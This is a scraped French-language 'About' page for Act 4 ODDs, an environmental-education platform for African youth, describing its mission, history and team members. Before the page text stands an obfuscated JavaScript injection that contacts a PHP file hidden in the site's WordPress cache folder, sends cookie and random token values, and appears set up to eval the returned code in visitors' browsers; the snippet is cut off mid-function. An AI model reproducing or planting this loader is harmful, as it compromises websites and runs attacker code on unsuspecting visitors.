;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//act4odds.com/wp-content/cache/all/4-choses-a-faire-pour-dire-bye-bye-au-gaspillage-quotidien-deau/feed/feed.php','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B

A propos

Salutation Green Warrior !!! Oui, c’est le nom que nous t’attribuons par ici.
Alors là, tu es devant ton écran, tu cherches la réponse à la question « Act 4 ODDs, c’est quoi ? » Oui, nous sommes devins.
Installe-toi bien, on te répond plus bas !!!

Act

« Agir » en anglais

4

lire « for » en anglais = pour

ODD

le sigle d’Objectifs de Développement Durable (qui sont 17, va googler si tu ne connais pas Green Warrior)

S

spécifiques (spécifique car notre cœur bat pour l’environnement et la préservation de la planète)


Act 4 ODDs est donc une plateforme qui vise à informer les populations africaines sur l’importance d’une participation à l’échelle individuelle à l’atteinte des objectifs du développement durable ayant trait à la préservation de la planète. Du coup, ici on explorera les questions environnementales, celles sur les changements climatiques et consorts…

Aujourd’hui, l’éducation environnementale se révèle être un besoin dans nos sociétés, une chose que l’on doit s’approprier.
Act 4 ODDs se fait un devoir de devenir le canal d’éducation environnementale par excellence de la jeunesse africaine. Outre cela, Act 4 ODDs ambitionne apporter des solutions à des problèmes environnementaux communautaires, valoriser des sites écotouristiques ou lieux riches en biodiversité, mettre en lumière de jeunes entrepreneurs qui ont fait de la question environnementale, la pierre angulaire de leur entreprise et bien d’autres choses promouvant la protection de l’environnement.

Comment Act 4 ODDs compte réaliser son pourquoi ?

Fournir des articles informatifs sur des thèmes relatifs aux questions environnementales.

Être une vitrine de projets replicables dans diverses communautés : nous vous les ferons découvrir dans la rubrique Green Initiatives et organiserons des séances discussions en ligne ou en présentiel avec leurs promoteurs/promotrices afin de rendre possible le réseautage.

Mettre en lumière les entrepreneurs et entreprises africaines vertes au travers de billets et de capsules vidéo.

Organiser des campagnes digitales visant à sensibiliser davantage sur la protection de l’environnement.

Mettre en oeuvre Nos initiatives pour comme le petit colibri, faire notre part pour la cause qui nous tient à coeur.

Au commencement était Climeo…


L’histoire débute en 2016 quand Climeo a.k.a Nihade ASSOUMANOU participe et gagne le 1er prix d’un concours de blogging sur les changements climatiques et le développement durable.
Malheureusement, ce tout premier blog est à ce jour, introuvable sur Internet. Après ce concours qui lui laisse bon souvenir, Climeo reprend l’aventure, cette fois-ci, sur le site Clime-Lasting qu’elle alimente jusqu’en 2018 avant de prendre une pause. Plus longue que prévue, cette pause fait naître Act 4 ODDs.

L’équipe derrière Act 4 ODDs

Seule, la lutte peut sembler donner rapidement des fruits. Toutefois, quand on vise le long terme, il faut laisser embarquer dans son navire des personnes qui épousent la même vision que soi. Act 4 ODDs, c’est également des jeunes qui font confiance en la vision de Climeo et qui s’investissent énormément pour la concrétiser.

Constance DEGUENON

Social Media Manager

Détail
T@ncy ou la faiseuse de pluie et de beau temps pour nos comptes sur les RS. Si tu nous remarques dans ta TL, c’est grâce à ses dons en matière d’Atalakou. Le virtuel, c’est son monde mais IRL, c’est aussi la super tata de nos enfants et la cheerleader des participants de nos activités.

Yannick ABODAH

Chargé des partenariats

Détail
YanoBio ou le meilleur écolo de la team (en bonne voie pour devenir végan) . Super calé sur les questions d’agroécologie et d’environnement, c’est celui qui tisse la toile de nos collaborations et il gère graaaave! Il a plus d’un tour dans son sac et c’est ce qui fait de lui, le meilleur à son poste.

Nihade ASSOUMANOU

REDAC’ CHEF

Détail
Climeo ou Nihade est la plume principale derrière chacun des contenus/articles de ce site. Oui, les mauvais jeux de mots, c’est elle. Elle est également la boîte à idées de la team et la chasseuse de sites écotouristiques et de greenpreneurs. Pour Climeo, 1 milliard d’ #ImparfaitEcolo, c’est bien mieux que ce même nombre ne faisant rien du tout.

Crépin BATANDEO

fULL-STACK DEVELOPER

Détail
Crépin’O ou le Geek AK47. Les codes, les langages Python, php etc., il maîtrise comme c’est pas permis. Cette plateforme, la team l’a rêvée et lui, l’a conçue. C’est peut-être le plus effacé de la team, mais c’est surtout un cerveau en ébullition 24h/24 et un tonton gâteau rêvant d’un monde meilleur pour les enfants.

Abigaïl HODOR

Graphic Designer

Détail
Abi ou la reine de la suite Adobe. La créa’ graphique n’a aucun secret pour elle. Si un jour, on ne rend pas bien sur les RS, toute la team s’en prendra à elle. Pour l’instant, en RVB ou en CMJN, nous voyons la vie en vert et c’est grâce à ses coups de pinceaux.

Koffi Hervé SEHONOU

SLASHEUR

Détail
RV est le second slasheur de la team. Eh oui, quand on est une team comme la nôtre, on a besoin de deux couteaux suisse pour gérer les imprévus, tellement il y en a. Sa spécialité à lui: gérer la team des bénévoles sur les projets en cours.

Moïse DJIWONOU

slasheur

Détail
Djikomo ou le couteau suisse de la team. C’est un slasheur, on ne sait pas vraiment dans quelle case le mettre mais une chose est sûre, il est dévoué et fait bien son travail chaque fois qu’on a besoin de lui. Sa spécialité : gérer les imprévus pendant l’organisation des activités.

Roméo AKATO

Photographe/Vidéaste

Détail
Ro’ ou le chasseur de moments. Il défie l’instant présent et fige tous nos événements dans le temps. Il en fait des albums. Si au détour, on a besoin de vidéos; c’est lui qui s’adonne à la tâche. L’audiovisuel n’a aucun secret pour lui et c’est avec plaisir qu’on pose tous devant sa caméra.
Nature Bliss by WEN Themes